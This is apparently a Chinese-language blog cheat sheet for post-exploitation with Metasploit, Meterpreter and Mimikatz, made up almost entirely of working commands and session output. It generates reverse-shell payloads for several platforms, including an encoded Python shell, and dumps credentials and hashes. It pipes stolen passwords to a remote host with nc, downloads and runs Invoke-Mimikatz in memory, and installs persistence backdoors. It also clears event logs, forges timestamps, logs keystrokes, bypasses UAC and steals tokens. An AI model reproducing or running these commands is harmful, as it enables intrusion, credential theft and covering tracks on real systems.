前言

记录一些metasploit framework的使用姿势

一、MSF

-p, --payload    <payload>       指定需要使用的payload(攻击荷载)
-l, --list       [module_type]   列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all
-n, --nopsled    <length>        为payload预先指定一个NOP滑动长度
-f, --format     <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder    [encoder]       指定需要使用的encoder(编码器)
-a, --arch       <architecture>  指定payload的目标架构--platform   <platform>      指定payload的目标平台
-s, --space      <length>        设定有效攻击荷载的最大长度
-b, --bad-chars  <list>          设定规避字符集,比如: &#039;\x00\xff&#039;
-i, --iterations <count>         指定payload的编码次数
-c, --add-code   <path>          指定一个附加的win32 shellcode文件
-x, --template   <path>          指定一个自定义的可执行文件作为模板
-k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行--payload-options            列举payload的标准选项
-o, --out   <path>               保存payload
-v, --var-name <name>            指定一个自定义的变量,以确定输出格式--shellest                   最小化生成payload
-h, --help                       查看帮助选项--help-formats               查看msf支持的输出格式列表

1、关于tomcat口令暴力猜解模块

use auxiliary/scanner/http/tomcat_mgr_login
show options
set rhosts 192.168.2.147
set RPORT 8080
run

注意:tomcat默认每个账号登陆5次失败后,账户就会被锁定

2、建立windows反弹shell

1.生成windows反弹shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
//LHOST为公网IP
//LPORT为反弹端口
//4433.exe为生成文件2.获取监听IP与端口msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run3.反弹成功meterpreter > sysinfo
Computer        : WIN-UKKED2CCSHJ
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windowsmeterpreter > getuid
Server username: IIS APPPOOL\padt002

3、msf建立linux反弹shell

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f elf > payload.elf
//LHOST为公网IP
//LPORT为反弹端口
//4433.exe为生成文件

4、msf建立persistence持久化

Meterpreter的persistence脚本允许注入Meterpreter代理,以确保系统重启之后Meterpreter还能运行。

  • 如果是反弹连接方式,可以设置连接攻击机的时间间隔
  • 如果是绑定方式,可以设置在指定时间绑定开放端口。

我们运行persistence脚本让系统开机自启动,启动命令为

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.OPTIONS:-A        Automatically start a matching exploit/multi/handler to connect to the agent-L <opt>  Location in target host to write payload to, if none %TEMP% will be used.-P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.-S        Automatically start the agent on boot as a service (with SYSTEM privileges)-T <opt>  Alternate executable template to use-U        Automatically start the agent when the User logs on-X        Automatically start the agent when the system boots-h        This help menu-i <opt>  The interval in seconds between each connection attempt-p <opt>  The port on which the system running Metasploit is listening-r <opt>  The IP of the system running Metasploit listening for the connect backmeterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105
//Meterpreter(-X),10秒(-i 10) 重连一次,使用端口为6666(-p 6666),连接的目的IP为 192.168.71.105
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WUST-3E75F1D708_20160106.3022/WUST-3E75F1D708_20160106.3022.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.71.105 LPORT=6666
[*] Persistent agent script is 148426 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[+] Agent executed with PID 1308
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
meterpreter >
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 2 opened (192.168.71.105:6666 -> 192.168.71.112:1086) at 2016-01-06 20:30:26 +0800meterpreter > exit
[*] Shutting down Meterpreter...[*] 192.168.71.112 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > sessions -iActive sessions
===============Id  Type                   Information                                      Connection--  ----                   -----------                                      ----------2   meterpreter x86/win32  WUST-3E75F1D708\Administrator @ WUST-3E75F1D708  192.168.71.105:6666 -> 192.168.71.112:1086 (192.168.71.112)msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...meterpreter >
自动化的脚本在C:\Documents and Settings\Administrator\Local Settings\Temp\下
自动化以后下次可以直接在msf下打开会话:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.71.105
lhost => 192.168.71.105
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > run[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 3 opened (192.168.71.105:6666 -> 192.168.71.112:1098) at 2016-01-06 21:05:58 +0800

5、可执行程序

Linux

反向连接:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
正向连接:
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

执行方式:直接复制可执行程序到目标机器上执行就行了。

6、Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

执行方式:将shell.php放在web目录下,使用浏览器访问,或者使用以下命令执行:

php shell.php

7、脚本shell

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

执行方式:复制shell.py中的内容在linux命令行下执行:

python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

8、shellcode

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

想要免杀,还是需要用shellcode。

二、mimikatz

1、获取密码方法

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load mimikatzLoading extension mimikatz...Success.
meterpreter > msv[+] Running as SYSTEM[*] Retrieving msv credentialsmsv credentials===============AuthID    Package    Domain        User           Password------    -------    ------        ----           --------0;334101  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }0;334068  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)0;49101   NTLM                                    n.s. (Credentials KO)0;999     NTLM       WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)
meterpreter > kerberos[+] Running as SYSTEM[*] Retrieving kerberos credentialskerberos credentials====================AuthID    Package    Domain        User           Password------    -------    ------        ----           --------0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE 0;996     Negotiate  WORKGROUP     CHENGLEE-PC$  0;49101   NTLM                                   0;999     NTLM       WORKGROUP     CHENGLEE-PC$  0;334101  NTLM       chenglee-PC   chenglee       lizhenghua0;334068  NTLM       chenglee-PC   chenglee       lizhenghuameterpreter > mimikatz_command -f samdump::hashesOrdinateur : chenglee-PCBootKey    : 0648ced51b6060bed1a3654e0ee0fd93Rid  : 500User : AdministratorLM   :NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0Rid  : 501User : GuestLM   :NTLM :Rid  : 1000User : chengleeLM   :NTLM : 8d0f8e1a18236379538411a9056799f5
meterpreter > mimikatz_command -f sekurlsa::searchPasswords[0] { chenglee ; chenglee-PC ; lizhenghua }[1] { chenglee ; chenglee-PC ; lizhenghua }[2] { chenglee ; chenglee-PC ; lizhenghua }[3] { chenglee ; chenglee-PC ; lizhenghua }[4] { chenglee-PC ; chenglee ; lizhenghua }[5] { chenglee-PC ; chenglee ; lizhenghua }meterpreter >meterpreter > mimikatz_command -f sekurlsa::searchPasswords[0] { Administrator ; CLOUDVM ; 1244567 }[1] { Administrator ; CLOUDVM ; 1244567 }

2、非交互式抓取密码

# 1.导出至shash.txt
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords""  exit >> shash.txt# 2.直接导出到vps,本地无痕迹
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit |  nc 192.168.2.134 4444

3、wdigest

meterpreter > wdigest[+] Running as SYSTEM[*] Retrieving wdigest credentialswdigest credentials===================AuthID    Package    Domain        User           Password------    -------    ------        ----           --------0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE 0;996     Negotiate  WORKGROUP     CHENGLEE-PC$  0;49101   NTLM                                   0;999     NTLM       WORKGROUP     CHENGLEE-PC$  0;334101  NTLM       chenglee-PC   chenglee       lizhenghua0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

4、tspkg

meterpreter > tspkg[+] Running as SYSTEM[*] Retrieving tspkg credentialstspkg credentials=================AuthID    Package    Domain        User           Password------    -------    ------        ----           --------0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE 0;996     Negotiate  WORKGROUP     CHENGLEE-PC$  0;49101   NTLM                                   0;999     NTLM       WORKGROUP     CHENGLEE-PC$  0;334101  NTLM       chenglee-PC   chenglee       lizhenghua0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

5、免杀方式

# 1.使用powershell,下载脚本,内存中执行
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz# 2.Procdump + Mimikatz
# procdump 下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
# 先进程导出
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# 再本地还原
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

三、meterpreter基本命令

1、系统命令

基本系统命令

sessions
//sessions –h 查看帮助
sessions -l
//列出当前会话
sessions -i <ID值>
//进入会话
sessions -k
//杀死会话
background
//将当前会话放置后台
run
//执行已有的模块,输入run后按两下tab,列出已有的脚本
info
//查看已有模块信息
getuid
//查看权限
getpid
//获取当前进程的pid
sysinfo
//查看目标机系统信息
ps
//查看当前活跃进程
kill <PID值>
//杀死进程
idletime
//查看目标机闲置时间
reboot
shutdown
//重启/关机
shell
//进入目标机cmd shell

execute执行文件

execute
//在目标机中执行文件
execute -H -i -f cmd.exe
//创建新进程cmd.exe,-H不可见,-i交互

clearev清除日志

clearev  #清除windows中的应用程序日志、系统日志、安全日志

2、文件系统命令

基本文件系统命令

getwd
pwd
//查看当前工作目录
ls
//列出当前目录
cd
//跳转目录
search -f *pass*
//搜索文件  -h查看帮助
cat c:\\lltest\\lltestpasswd.txt
//查看文件内容
upload /tmp/hack.txt C:\\lltest
//上传文件到目标机上
download c:\\lltest\\lltestpasswd.txt /tmp/
//下载文件到本机上
edit c:\\1.txt
//编辑或创建文件,没有的话,会新建文件
rm C:\\lltest\\hack.txt
//删除文件
mkdir lltest2
//只能在当前目录下创建文件夹
rmdir lltest2
//只能删除当前目录下文件夹
getlwd
lpwd
//操作攻击者主机 查看当前目录
lcd /tmp
//操作攻击者主机 切换目录

timestomp伪造时间戳

timestomp C:// -h
//查看帮助
timestomp -v C://2.txt
//查看时间戳
timestomp C://2.txt -f C://1.txt
//将1.txt的时间戳复制给2.txt

3、网络命令

# 基本
ipconfig/ifconfig
netstat –ano
arp
getproxy   #查看代理信息
route   #查看路由# portfwd端口转发
portfwd add -l 6666 -p 3389 -r 127.0.0.1 # 将目标机的3389端口转发到本地6666端口
rdesktop -u Administrator -p ichunqiu 127.0.0.1:4444 #然后使用rdesktop来连接,-u 用户名 -p 密码# autoroute添加路由
run autoroute –h #查看帮助
run autoroute -s 192.168.2.0/24  #添加到目标环境网络
run autoroute –p  #查看添加的路由
# 然后可以利用arp_scanner、portscan等进行扫描
run arp_scanner -r 192.168.2.0/24
run post/multi/gather/ping_sweep RHOSTS=192.168.2.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.2.0# autoroute添加完路由后,还可以利用msf自带的模块进行socks代理
# msf提供了3个模块用来做socks代理。
# auxiliary/server/socks4a
# use auxiliary/server/socks5
# use auxiliary/server/socks_unc
# 先background退出来,然后:
use auxiliary/server/socks4a
set srvhost 127.0.0.1
set srvport 1080
run# 然后vi /etc/proxychains.conf #添加 socks4 127.0.0.1 1080
# 最后proxychains 使用Socks4a代理访问# sniffer抓包
use sniffer
sniffer_interfaces   #查看网卡
sniffer_start 2   #选择网卡 开始抓包
sniffer_stats 2   #查看状态
sniffer_dump 2 /tmp/lltest.pcap  #导出pcap数据包
sniffer_stop 2   #停止抓包

4、提权

(1)getsystem

getsystem

getsystem工作原理:

  • getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。
  • getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。
  • Windows服务已启动,导致与命名管道建立连接。
  • 该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。
  • 然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。

(2)bypassuac

用户帐户控制(UAC)是微软在 Windows Vista 以后版本引入的一种安全机制,有助于防止对系统进行未经授权的更改。应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员专门给系统授予管理员级别的访问权限。UAC 可以阻止未经授权的应用程序进行自动安装,并防止无意中更改系统设置。

msf提供了如下几个模块帮助绕过UAC:

msf5 auxiliary(server/socks5) > search bypassuacMatching Modules
================#  Name                                              Disclosure Date  Rank       Check  Description-  ----                                              ---------------  ----       -----  -----------0  exploit/windows/local/bypassuac                   2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass1  exploit/windows/local/bypassuac_comhijack         1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)2  exploit/windows/local/bypassuac_eventvwr          2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)3  exploit/windows/local/bypassuac_fodhelper         2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)4  exploit/windows/local/bypassuac_injection         2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)5  exploit/windows/local/bypassuac_injection_winsxs  2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS6  exploit/windows/local/bypassuac_sluihijack        2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)7  exploit/windows/local/bypassuac_vbs               2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)

使用方法类似,运行后返回一个新的会话,需要再次执行getsystem获取系统权限

# 示例
meterpreter > getuid
Server username: SAUCERMAN\TideSec
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(multi/handler) >  use exploit/windows/local/bypassuac
msf5 exploit(windows/local/bypassuac) > set SESSION 4
SESSION => 4
msf5 exploit(windows/local/bypassuac) > run[-] Handler failed to bind to 192.168.81.160:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (206403 bytes) to 192.168.81.154
[*] Meterpreter session 5 opened (192.168.81.160:4444 -> 192.168.81.154:1134) at 2019-06-12 06:31:11 -0700
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.# 然后返回新的meterpreter会话,继续执行getsystem本应该会提权成功
# 然鹅这里失败了

(3)内核漏洞提权

无论是linux还是windows都出过很多高危的漏洞,我们可以利用它们进行权限提升,比如windows系统的ms13-081、ms15-051、ms16-032、ms17-010等,msf也集成了这些漏洞的利用模块。

meterpreter > run post/windows/gather/enum_patches  #查看补丁信息
msf5 > use exploit/windows/local/ms13_053_schlamperei
msf5 > set SESSION 2
msf5 > exploit# 示例
meterpreter > run post/windows/gather/enum_patches[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(windows/local/bypassuac) > search MS13-081Matching Modules
================#  Name                                             Disclosure Date  Rank     Check  Description-  ----                                             ---------------  ----     -----  -----------0  exploit/windows/local/ms13_081_track_popup_menu  2013-10-08       average  Yes    Windows TrackPopupMenuEx Win32k NULL Pagemsf5 exploit(windows/local/bypassuac) > use exploit/windows/local/ms13_081_track_popup_menu
msf5 exploit(windows/local/ms13_081_track_popup_menu) > set session 4
session => 4
msf5 exploit(windows/local/ms13_081_track_popup_menu) > exploit[!] SESSION may not be compatible with this module.
[-] Handler failed to bind to 192.168.81.160:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit aborted due to failure: no-target: Running against 64-bit systems is not supported
[*] Exploit completed, but no session was created.
# 然鹅失败了,摸摸头

5、远程桌面&截屏

enumdesktops
//查看可用的桌面
getdesktop
//获取当前meterpreter 关联的桌面
set_desktop
//设置meterpreter关联的桌面  -h查看帮助
screenshot
//截屏
use espia
//或者使用espia模块截屏  然后输入screengrab
run vnc
//使用vnc远程桌面连接

getgui命令

run getgui –h
//查看帮助
run getgui -e
//开启远程桌面
run getgui -u lltest2 -p 123456
//添加用户
run getgui -f 6661 –e
//389端口转发到6661

getgui 系统不推荐,推荐使用run post/windows/manage/enable_rdp
getgui添加用户时,有时虽然可以成功添加用户,但是没有权限通过远程桌面登陆

enable_rdp脚本

run post/windows/manage/enable_rdp
//开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456
//添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662
//将3389端口转发到6662

脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令

6、键盘记录

keyscan_start
//开始键盘记录
keyscan_dump
//导出记录数据
keyscan_stop
//结束键盘记录

7、信息收集

# 信息收集的脚本位于:
# modules/post/windows/gather
# modules/post/linux/gather
# 以下列举一些常用的
run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks   #获取最近的文件操作
run post/windows/gather/enum_ie  #获取IE缓存
run post/windows/gather/enum_chrome   #获取Chrome缓存
run post/windows/gather/enum_patches  #补丁信息
run post/windows/gather/enum_domain  #查找域控

8、哈希利用-获取哈希

run post/windows/gather/smart_hashdump
//从SAM导出密码哈希,需要SYSTEM权限

9、获取凭证

在内网环境中,一个管理员可能管理多台服务器,他使用的密码有可能相同或者有规律,如果能够得到密码或者hash,再尝试登录内网其它服务器,可能取得意想不到的效果。

(1)使用mimikatz

load mimikatz    #help mimikatz 查看帮助
wdigest  #获取Wdigest密码
mimikatz_command -f samdump::hashes  #执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords# 示例
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > wdigest
[!] Not currently running as SYSTEM
[*] Attempting to getprivs ...
[+] Got SeDebugPrivilege.
[*] Retrieving wdigest credentials
wdigest credentials
===================AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     SAUCERMAN$
0;48748   NTLM
0;999     NTLM       WORKGROUP     SAUCERMAN$
0;476238  NTLM       SAUCERMAN     TideSec        123456
0;476209  NTLM       SAUCERMAN     TideSec        123456meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : saucerman
BootKey    : 691cff33caf49e933be97fcee370256a
RegOpenKeyEx SAM : (0x00000005) �ݿ�
Erreur lors de l'exploration du registre
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { TideSec ; SAUCERMAN ; 123456 }
[1] { TideSec ; SAUCERMAN ; 123456 }
[2] { SAUCERMAN ; TideSec ; 123456 }
[3] { SAUCERMAN ; TideSec ; 123456 }
[4] { TideSec ; SAUCERMAN ; 123456 }
[5] { TideSec ; SAUCERMAN ; 123456 }

(2)使用meterpreter的run hashdump命令

meterpreter > run hashdump[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:268: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:272: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:279: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Dumping password hints...TideSec:"123456"[*] Dumping password hashes...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

(3)post/windows/gather/smart\_hashdump

从上面也可以看出官方推荐post/windows/gather/smart_hashdump

meterpreter > run post/windows/gather/smart_hashdump[*] Running module against SAUCERMAN
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /home/ubuntu/.msf4/loot/20190612084715_default_192.168.81.154_windows.hashes_439550.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hints...
[+]     TideSec:"123456"
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

(4)powerdump

同 hashdump,但失败了

meterpreter > run powerdump
[*] PowerDump v0.1 - PowerDump to extract Username and Password Hashes...
[*] Running PowerDump to extract Username and Password Hashes...
[*] Uploaded PowerDump as 69921.ps1 to %TEMP%...
[*] Setting ExecutionPolicy to Unrestricted...
[*] Dumping the SAM database through PowerShell...[-] Could not execute powerdump: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find the file specified.

10、假冒令牌

在用户登录windows操作系统时,系统都会给用户分配一个令牌(Token),当用户访问系统资源时都会使用这个令牌进行身份验证,功能类似于网站的session或者cookie。

msf提供了一个功能模块可以让我们假冒别人的令牌,实现身份切换,如果目标环境是域环境,刚好域管理员登录过我们已经有权限的终端,那么就可以假冒成域管理员的角色。

# 1.incognito假冒令牌
use incognito      #help incognito  查看帮助
list_tokens -u    #查看可用的token
impersonate_token 'NT AUTHORITY\SYSTEM'  #假冒SYSTEM token
或者impersonate_token NT\ AUTHORITY\\SYSTEM #不加单引号 需使用\\
execute -f cmd.exe -i –t    # -t 使用假冒的token 执行
或者直接shell
rev2self   #返回原始token# 2.steal_token窃取令牌
steal_token <pid值>   #从指定进程中窃取token   先ps
drop_token  #删除窃取的token

11、植入后门

Meterpreter仅仅是在内存中驻留的Shellcode,只要目标机器重启就会丧失控制权,下面就介绍如何植入后门,维持控制。

(1)persistence启动项后门

路径:metasploit/scripts/meterpreter/persistence

原理是在C:\Users***\AppData\Local\Temp\目录下,上传一个vbs脚本,在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项,

很容易被杀软拦截,官方不推荐

run persistence –h  #查看帮助
run persistence -X -i 5 -p 4444 -r 192.168.81.160
#-X指定启动的方式为开机自启动,-i反向连接的时间间隔(5s) –r 指定攻击者的ip
# 示例
meterpreter > run persistence -X -i 5 -p 4444 -r 192.168.81.160[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /home/ubuntu/.msf4/logs/persistence/SAUCERMAN_20190612.4235/SAUCERMAN_20190612.4235.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.81.160 LPORT=4444
[*] Persistent agent script is 99630 bytes long
[+] Persistent Script written to C:\Users\TideSec\AppData\Local\Temp\qexwcMF.vbs
[*] Executing script C:\Users\TideSec\AppData\Local\Temp\qexwcMF.vbs
[+] Agent executed with PID 3540
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\qrsXZuPqVbEgua
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\qrsXZuPqVbEgua

能实现同样功能的脚本还有:exploit/windows/local/persistence

(2)metsvc服务后门

在C:\Users***\AppData\Local\Temp\目录下,上传一个vbs脚本 在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项。**通过服务启动,需要管理员权限,官方不推荐使用,运行失败**

run metsvc –A   #自动安装后门# 示例
meterpreter > run metsvc –A[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\TideSec\AppData\Local\Temp\iInvhjKZbLH...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...Cannot open service manager (0x00000005)meterpreter > ls
Listing: C:\Users\TideSec\AppData\Local\Temp\iInvhjKZbLH
========================================================Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  178688  fil   2019-06-12 06:46:20 -0700  metsrv.dll
100777/rwxrwxrwx  45056   fil   2019-06-12 06:46:21 -0700  metsvc-server.exe
100777/rwxrwxrwx  61440   fil   2019-06-12 06:46:21 -0700  metsvc.exe

